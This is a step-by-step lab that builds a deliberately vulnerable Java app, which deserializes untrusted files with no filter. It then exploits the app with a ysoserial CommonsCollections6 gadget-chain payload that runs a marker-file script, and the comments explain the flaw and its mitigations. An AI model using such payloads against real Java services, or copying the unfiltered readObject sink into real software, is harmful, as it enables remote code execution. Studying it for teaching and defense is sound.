
Java Deserializer (example 1)

Setup


Get the external jars

# Gadget library that the sample app later puts on its classpath, and the
# ysoserial payload generator. Both are fetched without a checksum check.
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

Machine configuration: select Java 11

# Interactive menus: pick the Java 11 runtime and the matching compiler.
sudo update-alternatives --config java
sudo update-alternatives --config javac

Create the payload

# The command executed when the payload is deserialized. It only creates a
# marker file, which the final step uses as proof of execution.
echo "touch /tmp/pwned-by-java.txt" > exploit.sh

# Serialize a CommonsCollections6 gadget chain that invokes /tmp/exploit.sh.
java -jar ysoserial-all.jar CommonsCollections6 "/tmp/exploit.sh" > payload.ser

# The sample app is run against the copies placed in /tmp.
cp ./exploit.sh /tmp
cp ./payload.ser /tmp/

chmod +x /tmp/exploit.sh
# payload.ser is data read by the app, not executed; this chmod is not needed.
chmod +x /tmp/payload.ser

Create example app


DeSerializingObject.java

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

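public class DeSerializingObject {

    /**
     * Reads a serialized {@link Employee} from the file named by {@code args[0]}
     * and prints its fields.
     *
     * <p>{@link ObjectInputStream#readObject()} is invoked on a file taken from
     * the command line with no deserialization filter installed, so the stream
     * decides which classes on the classpath get instantiated before the cast to
     * {@code Employee} is ever reached. That is the sink this example exists to
     * show. Production code should restrict the stream to the expected classes
     * with {@link ObjectInputStream#setObjectInputFilter} (or the
     * {@code jdk.serialFilter} system property), or avoid Java serialization for
     * untrusted input altogether.
     *
     * @param args {@code args[0]} is the path of the serialized file
     */
    public static void main(String[] args) {
        // The documented invocation passes exactly one argument, so the path is
        // args[0]; reading args[1] would throw ArrayIndexOutOfBoundsException
        // before any deserialization happened.
        if (args.length < 1) {
            System.err.println("usage: DeSerializingObject <path-to-serialized-file>");
            return;
        }

        Employee employeeInput;
        // try-with-resources closes both streams even when readObject() throws.
        try (FileInputStream fis = new FileInputStream(args[0]);
             ObjectInputStream ois = new ObjectInputStream(fis)) {
            // Vulnerable sink: unfiltered deserialization of an untrusted file.
            employeeInput = (Employee) ois.readObject();
            System.out.println("Serialized data is restored from " + args[0]);
        } catch (IOException | ClassNotFoundException | ClassCastException e) {
            // ClassCastException covers a stream whose root object is not an Employee.
            e.printStackTrace();
            // Nothing was restored; dereferencing employeeInput below would NPE.
            return;
        }

        System.out.println("Name of employee is : " + employeeInput.getSerializeValueName());
        System.out.println("Salary of employee is : " + employeeInput.getNonSerializeValueSalary());
    }
}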

Employee.java

import java.io.Serializable;

/**
 * Plain serializable value object used by the deserialization example.
 *
 * <p>Only {@code serializeValueName} is written to the stream; the salary is
 * {@code transient} and so reads back as {@code 0} after a round trip.
 */
public class Employee implements Serializable {

    private static final long serialVersionUID = 1L;

    /** Persisted by Java serialization. */
    private String serializeValueName;

    /** Skipped by Java serialization. */
    private transient int nonSerializeValueSalary;

    /** @return the persisted name, or {@code null} if never set */
    public String getSerializeValueName() {
        return this.serializeValueName;
    }

    /** @return the in-memory salary ({@code 0} after deserialization) */
    public int getNonSerializeValueSalary() {
        return this.nonSerializeValueSalary;
    }

    /** @param serializeValueName the name to persist */
    public void setSerializeValueName(String serializeValueName) {
        this.serializeValueName = serializeValueName;
    }

    /** @param nonSerializeValueSalary the salary to hold in memory only */
    public void setNonSerializeValueSalary(int nonSerializeValueSalary) {
        this.nonSerializeValueSalary = nonSerializeValueSalary;
    }

    /** @return a one-line description showing only the persisted field */
    @Override
    public String toString() {
        StringBuilder text = new StringBuilder("Employee [serializeValueName=");
        text.append(this.serializeValueName);
        return text.append("]").toString();
    }

}

Compilation

# Compile both classes into the current directory, which is the "." entry of
# the classpath used in the next step.
javac Employee.java
javac DeSerializingObject.java

Exploitation


# Run the sample app with commons-collections 3.1 on its classpath; the gadget
# chain in payload.ser runs while readObject() is deserializing the file.
java -classpath .:commons-collections-3.1.jar DeSerializingObject "/tmp/payload.ser"

You should find the file pwned-by-java.txt in the /tmp directory as proof that the payload ran.